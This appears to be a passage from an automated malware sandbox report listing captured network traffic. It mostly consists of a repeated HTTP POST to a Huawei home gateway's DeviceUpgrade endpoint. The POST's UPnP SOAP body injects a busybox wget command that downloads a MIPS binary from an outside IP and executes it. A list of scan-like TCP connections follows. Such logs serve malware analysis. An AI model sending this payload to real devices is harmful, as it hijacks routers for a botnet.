    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Nov 2023 04:15:18 GMTServer: Apache/2.4.29 (Ubuntu)Set-Cookie: PHPSESSID=31u84j15nqd7mvk52pq30vi1dn; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1328Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 18 db 6e dc 44 f4 b9 f9 8a 89 1f 10 88 8c bd a9 5a a8 c2 ee 56 22 34 12 15 a5 51 08 20 9e aa b1 3d eb 9d 64 ec 71 67 c6 7b 41 3c 44 45 e2 85 4a 45 f0 00 6f fc 42 54 14 51 68 1b 7e c1 fb 47 9c 19 db 7b bf 65 d3 aa 91 12 db 67 ce 6d ce fd 64 ab be fd d9 c3 fd e3 ef 0e ef a1 b6 8e 79 73 ab 5e 3c e0 49 49 d8 dc 42 f0 53 8f a9 26 28 68 13 a9 a8 6e 38 5f 1f 1f e0 3b ce c4 91 48 34 4d e0 a8 cb 42 dd 6e 84 b4 c3 02 8a ed c7 0e 62 09 d3 8c 70 ac 02 c2 69 63 77 07 c5 a4 c7 e2 2c 1e 01 32 45 a5 fd 22 3e 00 12 e1 a0 84 c4 b4 e1 74 18 ed a6 42 ea 4a 96 66 9a d3 66 fe 4b fe 7c f0 24 bf 1c 9c e5 2f f2 bf f3 f3 c1 4f f9 8b c1 33 f4 03 ca 7f cb 5f e6 e7 f9 f3 fc f5 e0 e7 fc 02 e5 bf 5a 9c 4b c0 3d 47 fb 47 0f ea 5e 41 5f f0 da c6 18 1d 10 d0 53 24 18 97 30 ce 92 53 24 29 6f 38 06 ec a0 b6 a4 ad 86 d3 2a b0 5c f8 e3 20 dd 4f 41 31 16 93 88 7a 3d 6c d1 c0 56 37 6e 14 b4 05 81 97 f2 2c 62 89 f2 4e 1e 67 54 f6 b1 4a 59 92 50 e9 05 4a 79 be 10 5a 69 49 d2 0a ea c6 2c 71 e1 c4 29 04 2b dd e7 54 b5 29 d5 95 2c 4d 7b da 90 82 9c 49 31 6d ad 53 b5 e7 79 2d 30 be 72 23 21 22 4e 49 ca 94 1b 88 d8 10 dc 6d 91 98 f1 7e e3 48 f8 42 8b bd 5b b5 da ce c7 b5 da 7b 2a f3 8d 17 39 d1 2c d9 09 fa 92 71 ce 02 0c 42 de b0 06 c6 36 95 0a 0f 88 a6 12 62 e0 c3 cf 01 b8 c1 55 87 16 1d 9a 6f d2 98 9b 19 70 c8 35 11 21 44 2b e9 50 e5 d9 bf d7 64 47 12 88 0f 4d b1 51 b1 7c df 90 a3 e1 60 f1 af 41 1f 64 4a 8b f8 1a 0c 74 9b c6 60 19 c2 39 2e 5e 37 e4 e5 05 60 66 b7 c8 09 1b 21 19 f3 76 dd dd 9b ee 6e 25 c2 27 8a 56 49 93 b1 b5 c5 40 ad f2 8a 62 55 f7 45 d8 47 01 27 4a 35 1c 2e c0 1b 38 85 4c 45 96 3f e6 2c 6a 6b ec f3 8c 3a 63 45 e0 d0 20 7c 21 48 48 25 1a 56 82 90 75 2a 36 86 01 e6 f6 1c 77 21 d6 52 2a 4b f2 69 cc 02 69 ec 70 86 15 5c 66 1e ce 34 5e 59 1a 30 27 7d 50 2a e5 58 d2 70 0e c9 34 59 c0 64 c0 21 ec 38 33 4a 22 4e 5b 7a 01 d5 7c 4a a7 59 f7 00 b8 40 d0 92 a3 c5 3a 48 63 f2 b7 ae c4 1c f0 3c 50 da cc 7f 87 fe f0 d7 e0 6c f0 23 34 8e 7f f3 73 d7 75 eb 5e 3a e6 cd 11 55 f9 0a 41 3c e5 63 13 54 be e8 2d 8c 81 48 4c 47 00 29 33 e0 84 74 88 0a 24 4b f5 5e 47 b0 f0 fd da 07 9f c0 6d 59 1c 21 25 03 48 10 db 55 94 67 58 b8 69 12 19 4b 90 b9 ba cd 58 8e c8 e9 f8 18 3f 36 49 31 2f e2 5a 42 c6 88 85 10 6f 2c 4a 1e 31 68 78 d0 cc db 02 00 87 0f bf 3a 5e 23 e0 62 05 4a ce 6f c7 6b 86 0b 4b d2 4c e3 48 8a 2c 5d 16 25 2a 25 c9 1c 12 4c c2 d0 36 e0 45 84 96 98 0d d5 2d bb 90 6d db 50 39 20 40 95 48 ea 1e 5b 22 d9 33 a2 d7 8b 5f 63 4e a8 31 09 5d a9 90 b9 c1 58 1d 73 26 38 98 59 4a 0a 5e cd 40 36 e0 1c 28 02 24 a0 6d c1 a1 78 34 9c fc Data Ascii
    Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 114.94.64.5
    Source: unknownTCP traffic detected without corresponding DNS query: 162.141.211.5
    Source: unknownTCP traffic detected without corresponding DNS query: 93.199.244.148
    Source: unknownTCP traffic detected without corresponding DNS query: 53.249.28.4
    Source: unknownTCP traffic detected without corresponding DNS query: 252.238.114.160
    Source: unknownTCP traffic detected without corresponding DNS query: 242.181.113.0
    Source: unknownTCP traffic detected without corresponding DNS query: 106.39.193.213
    Source: unknownTCP traffic detected without corresponding DNS query: 192.50.96.130
    Source: unknownTCP traffic detected without corresponding DNS query: 122.197.72.37
    Source: unknownTCP traffic detected without corresponding DNS query: 179.242.135.188
    Source: unknownTCP traffic detected without corresponding DNS query: 59.107.90.4
    Source: unknownTCP traffic detected without corresponding DNS query: 42.226.221.113
    Source: unknownTCP traffic detected without corresponding DNS query: 98.160.247.69
    Source: unknownTCP traffic detected without corresponding DNS query: 203.241.90.77
    Source: unknownTCP traffic detected without corresponding DNS query: 146.224.234.63
    Source: unknownTCP traffic detected without corresponding DNS query: 186.164.105.226
    Source: unknownTCP traffic detected without corresponding DNS query: 147.114.99.192
    Source: unknownTCP traffic detected without corresponding DNS query: 172.69.45.154
    Source: unknownTCP traffic detected without corresponding DNS query: 251.55.15.178
    Source: unknownTCP traffic detected without corresponding DNS query: 207.62.104.84
    Source: unknownTCP traffic detected without corresponding DNS query: 168.34.97.135
    Source: unknownTCP traffic detected without corresponding DNS query: 245.119.133.202
    Source: unknownTCP traffic detected without corresponding DNS query: 106.179.194.201
    Source: unknownTCP traffic detected without corresponding DNS query: 193.181.25.130
    Source: unknownTCP traffic detected without corresponding DNS query: 192.216.76.220
    Source: unknownTCP traffic detected without corresponding DNS query: 193.62.227.226
    Source: unknownTCP traffic detected without corresponding DNS query: 190.156.36.103
    Source: unknownTCP traffic detected without corresponding DNS query: 95.75.251.164
    Source: unknownTCP traffic detected without corresponding DNS query: 113.199.4.118
    Source: unknownTCP traffic detected without corresponding DNS query: 168.128.35.75
    Source: unknownTCP traffic detected without corresponding DNS query: 86.0.51.238
    Source: unknownTCP traffic detected without corresponding DNS query: 120.113.107.197
    Source: unknownTCP traffic detected without corresponding DNS query: 187.204.148.225
    Source: unknownTCP traffic detected without corresponding DNS query: 9.89.253.171
    Source: unknownTCP traffic detected without corresponding DNS query: 24.255.105.201
    Source: unknownTCP traffic detected without corresponding DNS query: 9.155.9.15
    Source: unknownTCP traffic detected without corresponding DNS query: 2.128.9.145
    Source: unknownTCP traffic detected without corresponding DNS query: 86.252.180.89
    Source: unknownTCP traffic detected without corresponding DNS query: 197.131.96.98
    Source: unknownTCP traffic detected without corresponding DNS query: 75.118.133.27
    Source: unknownTCP traffic detected without corresponding DNS query: 36.227.243.200
